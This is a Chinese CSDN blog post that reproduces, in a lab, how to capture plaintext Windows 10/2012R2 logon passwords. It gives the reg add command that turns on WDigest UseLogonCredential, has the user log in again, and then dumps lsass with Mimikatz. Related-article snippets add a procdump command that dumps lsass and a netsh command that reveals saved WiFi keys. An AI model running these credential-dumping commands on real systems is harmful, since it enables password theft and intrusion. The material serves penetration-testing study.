Win10 明文抓取 复现

最新推荐文章于 2022-06-09 20:35:54 发布
最新推荐文章于 2022-06-09 20:35:54 发布
阅读量313 收藏 1
点赞数
分类专栏: 内网渗透
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/prettyX/article/details/114965456
版权

这篇文章是根据安全客文章《Win10及2012系统以后的明文抓取方式》,在本地搭建环境复现,在这里整理记录

1、通过各种可行的方法获取lsass.exe进程的dump文件

2、在默认情况下,当系统为Win10或2012R2以上时,默认在内存缓存中禁止保存明文密码,如下图,密码字段显示为null

3、此时可以通过修改注册表的方式抓取明文,但需要用户重新登录后才能成功抓取,通过修改注册表来让Wdigest Auth保存明文口令

reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1 /f

4、如需恢复原样,只需将上图REG_DWORD的值1改为0即可

reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 0 /f

5、此时,再利用Mimikatz提取Lsass的Dump文件,即可抓出明文

 

加油 : )

prettyX
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
【mimikatz】获取windows平台的用户密码以及解决报错问题记录
weixin_44723534的博客
03-26 7034
一、思路 1.准备虚拟机环境windows7、windows10 2.检查电脑是32位还是64位 3.根据电脑32位/32位下载mimikatz工具 4.提前把电脑杀毒功能关闭 5.支持获取用户密码平台 支持:windows 7、windows server 2008、windows server 2012 不支持:windows10 6.mimikatz工具功能 mimikatz工具直接从lsass.exe进程里获取windows处于active状态账号的明文密码。 支持提升进程权限、注入进程,读取进程内
win10及win2012之后系统的明文抓取方式
聚鼎安全
03-29 3533
原文地址:https://www.anquanke.com/post/id/175364 抓取明文:手工修改注册表 + 强制锁屏 + 等待目标系统管理员重新登录 = 截取明文密码 1.procdump+mimikatz获取win10/win2012 R2用户明文密码 测试环境:win10企业版和win2012 R2 版本 工具下载:链接:https://pan.baidu.c...
Win10系统中用mimikatz抓取明文密码
weixin_42558965的博客
03-22 4149
实验环境 :Windows10专业版 参考了网上的方法,发大部分都是抄的 https://blog.csdn.net/netsec_steven/article/details/107257325 这一篇文章,都被转烂了,这一篇文章是对的,但是路径上还是有点小问题的,原因是原作者跳了一个步骤 这个步骤是:在注册表HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest下新建一个名为UseLogonCredential的DWORD值,并且
windows 2012 抓明文密码方法
Jiajia2017的博客
05-28 725
mickey | 2015-05-11 11:52 默认配置是抓不到明文密码了,神器mimikatz显示Password为null Authentication Id : 0 ; 121279 (00000000:0001d9bf) Session : Interactive from 1 User Name : mickey Domain ...
Windows10明文密码抓取
小晓晓晓林的博客
01-21 8637
procdump+mimikatz获取win10用户明文密码 测试环境:Win10 企业版LTSC 1809 工具下载:k8版本的mz64.exe、procdumpv9.0 原理:获取到内存文件lsass.exe进程(它用于本地安全和登陆策略)中存储的明文登录密码 利用前提:拿到了admin权限的cmd,管理员用密码登录机器,并运行了lsass.exe进程,把密码保存在内存文件lsass进...
FTP连接与密码明文抓取的实验内容(win2003).pdf
07-10
FTP连接与密码明文抓取的实验内容(win2003).pdf 学习资料 习资料 教学资源
telnet服务win10可用
05-18
标题中的“telnet服务win10可用”表明我们讨论的主题是关于在Windows 10操作系统上启用和使用Telnet服务。通常,Windows 10默认并未启用这项服务,因为出于安全考虑,它在较新的系统版本中被逐渐淘汰。然而,对于...
win10恢Telnet客户端
12-21
标题中的“win10恢Telnet客户端”是指在Windows 10操作系统中重新启用和安装Telnet客户端服务的过程。在某些情况下,Telnet客户端可能默认未启用,导致用户无法通过命令行界面进行远程连接。以下是对这个过程的...
FTP连接与密码明文抓取的实验内容(win2008).pdf
07-10
《FTP连接与密码明文抓取的实验详解》 FTP(File Transfer Protocol),即文件传输协议,是一种用于在网络上进行文件传输的标准协议。在Windows 2008环境下,FTP连接的建立以及密码的明文传输可能存在安全隐患。...
mimikatz 抓取 Windows 明文密码
06-02
Mimikatz - Windows 密码抓取神器 轻量级调试器神器 - mimikatz - 直接抓取 Windows 明文密码! 这个神器的功能肯定不仅仅如此 在我看来它更像一个轻量级调试器 可以提升进程权限 注入进程 读取
内网渗透之mimikatz+procdump 提取 Windows 明文密码
Adminxe的博客
05-05 3345
0x00 原理 获取到内存文件 lsass.exe 进程 (它用于本地安全和登陆策略) 中存储的明文登录密码。 0x01 操作 Windows10/2012 以下的版本: 1、上传 procdump 执行命令转存出 lsass.dmp 文件(需要管理员权限) procdump64.exe -accepteula -ma lsass.exe lsass.dmp 2、拿到 mimika...
内网渗透Windows密码凭证获取
qq_46258964的博客
06-09 2692
记录一下抓取window凭证信息的一些工具 Windows凭证抓取1,procdump (官方工具无视免杀)(首选) procdump + mimikatz 加载dmp文件,并导出其中的明文密码(procdump过杀软) 2,注册表读取windows hash (首选) 当目标为win10或2012R2以上时,默认在内存缓存中禁止保存明文密码,但可以通过修改注册表的方式抓取明文。 注册表读取密码主要获取的是3个文件 3,Pwdump 4,mimikatz(名声最大的密码获取工具) 5,MSF MSF框架密
Windows下获取已保存的WiFi明文密码
夜鹰的专栏
03-31 429
首先以管理员运行cmd,列出所有已保存的无线网络 netshwlanshowprofiles 获取密码 netshwlanshowprofilename="wifi名称(SSID)"key=clear 所列出的安全设置中“关键内容”就是该SSID的明文密码 ...
防范明文密码和散列值抓取
weixin_41082546的博客
02-12 1223
一、单机密码抓取的防范方法   微软为了防止用户密码在内存中以明文形式泄露,发不了补丁KB2871997,关闭了Wdigest功能。windows server 2012以上版本默认关闭Wdigest,使攻击者无法从内存中获取明文密码。对于win server 2012以下版本,通过安装KB2871997补丁,可以避免攻击者获取明文密码。   通过查看注册表键值,可以判断Wdigest功能状态...
内网渗透(抓取明文密码)
qq_42383069的博客
12-26 1230
内网渗透--抓取密码
windows下不错的文本抓取工具
martinbooch的博客
06-15 228
windows下不错的文本抓取工具 WindowsTextCopyer.exe
横向移动之windows登录账号密码导出
good good study
02-16 2803
在默认情况下,当系统为win10或2012R2及以上时,默认在内存缓存中禁止保存明文密码,所以无法在 lsass.exe 进程中抓取明文密码。此时可以通过修改注册表的方式抓取明文,但需要用户重新登录后才能成功抓取
win10 rdp 密码加密工具
最新发布
07-31
Win10 RDP(远程桌面协议)是Windows 10操作系统中提供的一种远程连接工具,它允许用户从远程位置访问和控制其他计算机。RDP密码加密工具是一种用于保护RDP连接密码的工具。 在Win10的RDP中,密码是通过加密算法...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值